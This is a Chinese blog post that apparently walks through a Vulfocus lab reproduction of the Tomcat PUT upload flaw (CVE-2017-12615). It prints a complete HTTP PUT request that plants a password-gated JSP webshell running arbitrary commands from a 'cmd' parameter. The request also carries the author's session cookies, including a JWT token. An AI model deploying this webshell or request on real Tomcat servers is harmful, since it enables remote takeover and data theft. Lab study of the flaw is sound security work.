[Vulfocus解题系列]Tomcat 远程代码执行漏洞(CVE-2017-12615)

最新推荐文章于 2024-04-26 15:09:14 发布
最新推荐文章于 2024-04-26 15:09:14 发布
阅读量1.6k 收藏 8
点赞数 1
分类专栏: 漏洞复现 文章标签: tomcat 服务器 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/122291968
版权

介绍

Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。

复现过程

访问根路径
在这里插入图片描述
burp抓包
在这里插入图片描述
修改第一行为PUT和增加POST请求体,修改后为

PUT /shell.jsp/ HTTP/1.1
Host: vulfocus.fofa.so:52815
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1640763811,1640775017,1640775045,1640921749; Hm_lvt_deaeca6802357287fb453f342ce28dda=1640681447,1641044574,1641123950,1641176861; ECS[visit_times]=4; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1641213978; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0MjEzLCJ1c2VybmFtZSI6IjAweW9uZ3NoaXdhbmd6aSIsImV4cCI6MTY0MTI2MzI2NCwiZW1haWwiOiIxMDcwMDg2ODgyQHFxLmNvbSJ9.aU-yjS3J_EqTEhZx8ZOSQ6SPxgSemy8XAqnFgtwX59Y
Upgrade-Insecure-Requests: 1
Content-Length: 421

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

在这里插入图片描述
直接访问shell.jsp文件。同时GET传递pwd(123),和cmd,漏洞复现成功
在这里插入图片描述

00勇士王子
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
针对Tomcat 远程代码执行漏洞CVE-2017-12615)的一次实战
看不尽的尘埃——博客
01-20 3300
前言 今天想多实践实践Tomcat中间件的漏洞。于是乎,把墨者学院的靶场全做了。 下面来看一下对Tomcat 远程代码执行漏洞的一次战斗! 一开始拿到这个靶场时,都不知道该如何入手,于是去百度搜了相关资料。 找到了一篇好文章,写的简单明了!阅读完后,发现要复现和利用还是很简单的。只要一个burp工具就够了! https://www.freebuf.com/vuls/148283.html...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器执行任意代码,从而可能导致数据泄露、...
漏洞复现-Tomacat-文件上传】vulfocus/tomcat-cve_2017_12615
10-09 1335
【Tomacat-文件上传】
Tomcat任意文件上传(CVE-2017-12615
m0_73720136的博客
05-07 1110
掌握文件上传中的Tomcat任意文件上传(CVE-2017-12615漏洞影响的Tomcat版本以及配置文件,利用Burp Suite工具抓取数据包,将数据包内容修改,请求方式修改为PUT方式,上传新建的jsp脚本文件,文件内容可以任意编写,也可以是木马。1. NTFS文件流2. 文件名相关限制可以采取一些方法来绕过限制,比如Windows中文件名不能以空格结尾,在文件名后面加空格"%20",也可以加斜杠"/"。
python爬虫 - 爬取html格式数据(CDSN博客)
BullKing8185的博客
04-26 1710
python爬虫六部曲: 第一步:安装requests库和BeautifulSoup库 第二步:获取爬虫所需的header和cookie 第三步:获取网页 第四步:解析网页 第五步:分析得到的信息,简化地址: 第六步:爬取内容,清洗数据
TomcatPUT的文件上传漏洞(CVE-2017-12615)
weixin_52458793的博客
02-12 1154
详细教程
buuctf [Tomcat]CVE-2017-12615
qq_1873822的博客
03-17 1539
漏洞简介 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行漏洞影响 Apache Tomcat 7.0.0 – 7.0.81 ...
Tomcat代码执行漏洞(CVE-2017-12615)
Li-D的博客
08-30 7338
漏洞描述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。 影响版
vulfocus——Tomcat任意写入文件漏洞(CVE-2017-12615)
Zichel77的博客
08-09 1146
打开靶场如图 根据提示,可以使用PUT方法上传任意文件,于是抓包 将其传给Repeater 将头修改为PUT,并上传jsp文件,注意上传的时候一般jsp都是不被允许上传的,所以我们需要绕过,主要有三种方法 注意!!!!PUT后面要有空格!!!!否则行不通!!!! 法一: 使用斜杠/,斜杠在文件名中是非法的,所以会被去除(Linux和Windows) PUT /x.jsp/ HTTP/1.1 法二: 使用空格%20,在Windows下不允许文件以空格结尾,因此上传到windo..
tomcat7.x远程命令执行CVE-2017-12615漏洞利用复现
m0_58606546的博客
01-11 4083
一、漏洞前言 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险 二、漏洞名称 CVE-2017-12615-远程
CVE-2017-12615 Tomcat远程命令执行漏洞
mirocky的博客
10-13 580
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行
CVE-2017-12615远程代码执行漏洞
Biu_Biu_Bi的博客
04-07 1816
Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。2、使用burpsuite抓包,修改GET为PUT上传方式,添加文件名1.jsp/,添加shell脚本。1、使用冰蝎v4.05生成jsp脚本。5、打开ip:8080,成功开启。4、测试成功上传Shell。
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
Tomcat任意文件上传漏洞CVE-2017-12615
bring_coco的博客
03-24 729
漏洞介绍 漏洞描述 当存在漏洞Tomcat运行在Windows主机上,并且启用了HTTP PUT请求方法(例如:将readonly初始化参数由默认值设置为false),攻击者将有可能通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将被服务器执行,导致服务器上的数据泄露或获取服务器权限 漏洞影响 泄露用户代码数据,或用户服务器被攻击者控制 影响版本 Apache Tomcat 7.0.0-7.0.79 漏洞利用 环境:vulhub(ip:192.16
TomcatPUT的上传漏洞(CVE-2017-12615)
小小猪的博客
11-19 3618
Tomcat远程代码执行漏洞复现(CVE-2017-12615) 漏洞描述: 当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 受影响的版本: Apache Tomcat 7.0.0 to 7.0.79 利用条件: Apache
Tomcat任意写入文件漏洞CVE-2017-12615
hovcfuti的博客
10-12 67
Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。当在Tomcat的conf(配置目录下)/web.xml配置文件中添加readonly设置为false时,将导致该漏洞产生,(需要允许put请求)发送到repeater,修改请求方式为put,将写好的jsp木马放到请求体中。
OpenSSH 远程代码执行漏洞(CVE-2024-6387)
最新发布
07-04
这个漏洞允许攻击者通过精心构造的 SSH 命令执行任意系统命令,从而获得对远程服务器的控制,如果用户权限足够,这可能导致严重的数据泄露或系统破坏。具体来说,攻击者能够利用该漏洞通过发送恶意 SSH 延迟请求,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值